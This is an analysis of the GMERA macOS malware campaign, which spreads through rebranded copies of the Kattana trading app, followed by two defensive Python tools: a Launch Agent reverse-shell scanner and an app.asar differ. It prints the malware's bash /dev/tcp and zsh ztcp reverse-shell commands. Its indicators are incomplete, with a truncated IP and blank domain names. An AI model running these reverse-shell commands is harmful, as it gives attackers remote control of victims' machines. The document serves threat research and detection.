# ESET researchers lure GMERA malware operators to remotely control their Mac honeypots

We've recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis they published in September 2019. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address.

This time, however, not only did the malware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading application with new names and copied its original website. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus.

In addition to the analysis of the malware code, ESET researchers have also set up honeypots to try to reveal the motivations behind this group of criminals.

We have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We couldn't confirm that it was linked to this particular campaign, but it could very well be the case.

```sh
echo 'sdvkmsdfmsd…kxweivneivne'
while :
do
    # wait, then tear down the previous session and anything still holding port 25733
    sleep 10000
    screen -X quit
    lsof -ti :25733 | xargs kill -9
    # respawn the interactive reverse shell in a detached screen session
    screen -d -m bash -c 'bash -i >/dev/tcp/17/25733 0>&1'
done
echo 'sdvkmsdfmsdfms…nicvmdskxweivneivne'
```

If run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but in the Licatrade sample that fails: the Launch Agent meant to run it never starts. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server. The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in.

The various reverse shells used by these malware operators connect to different remote ports depending on how they were started (the ports we list are based on the Licatrade sample). Here are some example command lines used:

```sh
# zsh variant: ztcp opens a TCP connection and leaves its file descriptor in $REPLY,
# then a new zsh is started with stdin, stdout and stderr all wired to that socket
zsh -c 'zmodload zsh/net/tcp && ztcp 17 25734 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
```

The rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change in name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms to perform trading, we verified whether the input fields for these were tampered with and whether credentials were exfiltrated in some way. Kattana is built with Electron, and Electron apps ship an app.asar file, an archive containing the JavaScript code of the application. We checked all changes between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.

Figure 7. Licatrade certificate was revoked May 28th, 2020

For each of the other campaigns we analyzed, a different certificate was used. Both were already revoked by Apple when we started our analyses. See the IoCs section for details about these. It's interesting to note that in the case of Cointrazer, there were only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their trojanized application. This, and the fact that we didn't find anything else signed with the same key, suggests they got the certificate explicitly for that purpose.

The malicious Licatrade application was available on the website and its C&C HTTP report server domain is. Both domains were registered using the email address. Searching for other domains registered with that email address reveals what looks like several previous campaigns. Here is a list of domains we found in samples or registered with that email address.

| Domain name | Role |
|---|---|
| | C&C server for HTTP report of Stockfolio app |
| | Website distributing the malicious Stockfolio app |
| | Website distributing the malicious Latinum app |
| | Website distributing the malicious Trezarus app |
| | C&C server for HTTP report of Cointrazer app |
| | Website distributing the malicious Cointrazer app |
| | C&C server for HTTP report of Licatrade app |
| | Website distributing the malicious Cupatrade app |
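The two launcher shapes quoted above (bash's `/dev/tcp` redirection inside a detached `screen` loop, and zsh's `ztcp` builtin) are easy to hunt for in Launch Agent plists and in dropped shell scripts. The scanner below is an added example written for this page, not ESET's tooling; it flattens a Launch Agent's `ProgramArguments`, extracts the remote host and port each command line would dial, and flags the supporting tricks (`screen -d -m`, `zmodload zsh/net/tcp`, the `lsof -ti` kill). The sample script and plist are constructed, the label `com.example.updater` is hypothetical, and the address 203.0.113.5 is a documentation-range IP rather than a real indicator; `scan_directory` generalizes the check to a whole `~/Library/LaunchAgents` folder.

```python
"""Hunt for reverse-shell launchers in macOS Launch Agents and shell scripts.

Added example, not ESET's code: matches the bash /dev/tcp and zsh ztcp
launchers described in the GMERA analysis, extracts the host:port each one
dials out to, and flags the screen/lsof respawn scaffolding around them.
"""
import plistlib
import re
from pathlib import Path

# Launcher shapes seen in the samples; each regex captures (host, port).
PATTERNS = {
    "bash /dev/tcp redirection": re.compile(r"/dev/tcp/([\w.\-]+)/(\d{1,5})"),
    "zsh ztcp builtin": re.compile(r"\bztcp\s+([\w.\-]+)\s+(\d{1,5})"),
}
# Supporting tricks that raise confidence even without a host:port match.
CONTEXT = {
    "detached screen session": re.compile(r"\bscreen\s+-d\s+-m\b"),
    "zsh tcp module load": re.compile(r"\bzmodload\s+zsh/net/tcp\b"),
    "kills old listener via lsof": re.compile(r"\blsof\s+-ti\s*:(\d{1,5})"),
}


def find_reverse_shells(text):
    """Return one dict per remote host:port a command line would connect to."""
    hits = []
    for technique, rx in PATTERNS.items():
        for host, port in rx.findall(text):
            hits.append({"technique": technique, "host": host, "port": int(port)})
    return hits


def context_flags(text):
    """Names of the supporting tricks present in the text, sorted."""
    return sorted(name for name, rx in CONTEXT.items() if rx.search(text))


def scan_launch_agent(plist_bytes):
    """Inspect one Launch Agent: flatten Program/ProgramArguments and scan it."""
    agent = plistlib.loads(plist_bytes)
    parts = [agent.get("Program", "")] + list(agent.get("ProgramArguments", []))
    cmdline = " ".join(p for p in parts if p)
    return {
        "label": agent.get("Label"),
        "run_at_load": bool(agent.get("RunAtLoad", False)),
        "shells": find_reverse_shells(cmdline),
        "flags": context_flags(cmdline),
    }


def scan_directory(path):
    """Scan every *.plist in a LaunchAgents folder; unparseable files are skipped."""
    results = {}
    for p in Path(path).expanduser().glob("*.plist"):
        try:
            results[p.name] = scan_launch_agent(p.read_bytes())
        except Exception:  # malformed plist, binary junk, permission error
            continue
    return results


# Constructed sample inputs (not real IoCs); 203.0.113.5 is a documentation address.
SAMPLE_SCRIPT = r"""
echo 'sdvk'
while :
do
    sleep 10000
    screen -X quit
    lsof -ti :25733 | xargs kill -9
    screen -d -m bash -c 'bash -i >/dev/tcp/203.0.113.5/25733 0>&1'
done
"""

SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>RunAtLoad</key><true/>
  <key>ProgramArguments</key><array>
    <string>/bin/zsh</string><string>-c</string>
    <string>zmodload zsh/net/tcp &amp;&amp; ztcp 203.0.113.5 25734 &amp;&amp; zsh &gt;&amp;$REPLY 2&gt;&amp;$REPLY 0&gt;&amp;$REPLY</string>
  </array>
</dict></plist>
"""

if __name__ == "__main__":
    print(find_reverse_shells(SAMPLE_SCRIPT), context_flags(SAMPLE_SCRIPT))
    print(scan_launch_agent(SAMPLE_PLIST))
    for name, result in scan_directory("~/Library/LaunchAgents").items():
        if result["shells"]:
            print(name, result)
```

The host:port pairs it returns are what you match against known C&C addresses; the Launch Agent result also carries `RunAtLoad`, which is the persistence property that made the Cointrazer agent fire at login.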
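The app.asar comparison described above (original Kattana against the Licatrade copycat, where only strings and images differed) can be reproduced without Electron's tooling: the asar container is a small JSON header followed by concatenated file contents. The reader and differ below are an added example written for this page, not ESET's or Electron's code. The two archives it compares are constructed in memory with a small packer, so the file names and contents are illustrative, not the real Kattana files.

```python
"""Diff the contents of two Electron app.asar archives.

Added example, not ESET's tooling. Electron packs an app's JavaScript into
app.asar; this minimal reader walks the archive's JSON header, hashes every
file in two archives and reports what was added, removed or modified.
"""
import hashlib
import json
import struct


def read_asar(blob):
    """Return {path: bytes} for every file stored in an in-memory asar blob.

    Layout: u32(4) | u32(header_size) | u32(payload_size) | u32(json_len) |
    JSON header padded to 4 bytes | concatenated file contents. Offsets in the
    JSON are decimal strings relative to the end of the header block.
    """
    header_size = struct.unpack_from("<I", blob, 4)[0]
    json_len = struct.unpack_from("<I", blob, 12)[0]
    header = json.loads(blob[16:16 + json_len].decode("utf-8"))
    data_start = 8 + header_size
    files = {}

    def walk(node, prefix):
        for name, entry in node["files"].items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:                 # sub-directory
                walk(entry, path)
            elif entry.get("unpacked"):          # stored in app.asar.unpacked, not here
                continue
            else:
                off = data_start + int(entry["offset"])
                files[path] = blob[off:off + entry["size"]]

    walk(header, "")
    return files


def sha256_map(files):
    return {p: hashlib.sha256(c).hexdigest() for p, c in files.items()}


def diff_asar(original, copycat):
    """Classify every path in either archive by comparing content hashes."""
    ha, hb = sha256_map(read_asar(original)), sha256_map(read_asar(copycat))
    common = set(ha) & set(hb)
    return {
        "added": sorted(set(hb) - set(ha)),
        "removed": sorted(set(ha) - set(hb)),
        "modified": sorted(p for p in common if ha[p] != hb[p]),
        "unchanged": sorted(p for p in common if ha[p] == hb[p]),
    }


def build_asar(files):
    """Pack {path: bytes} into an asar blob; used here to construct sample input."""
    root = {"files": {}}
    data = bytearray()
    for path, content in files.items():
        node = root
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(content), "offset": str(len(data))}
        data += content
    hdr = json.dumps(root).encode("utf-8")
    padded = hdr + b"\0" * (-len(hdr) % 4)
    payload_size = 4 + len(padded)       # u32 string length + padded JSON
    header_size = 4 + payload_size       # u32 payload size + payload
    return struct.pack("<IIII", 4, header_size, payload_size, len(hdr)) + padded + bytes(data)


# Constructed sample archives (illustrative, not the real Kattana/Licatrade files).
ORIGINAL = build_asar({
    "package.json": b'{"name":"kattana","productName":"Kattana"}',
    "main.js": b"require('./lib/login').start();",
    "lib/login.js": b"exports.start = () => console.log('login form');",
    "assets/icon.png": b"\x89PNG original",
})
COPYCAT = build_asar({
    "package.json": b'{"name":"licatrade","productName":"Licatrade"}',
    "main.js": b"require('./lib/login').start();",
    "lib/login.js": b"exports.start = () => console.log('login form');",
    "assets/icon.png": b"\x89PNG rebranded",
})

if __name__ == "__main__":
    for kind, paths in diff_asar(ORIGINAL, COPYCAT).items():
        print(f"{kind:9} {paths}")
```

On a real bundle, feed `read_asar` the bytes of `Contents/Resources/app.asar` from each application; a copycat that only changed branding shows up as modifications confined to metadata and assets, while a tampered login form would surface as a modified `.js` file worth opening in a diff viewer.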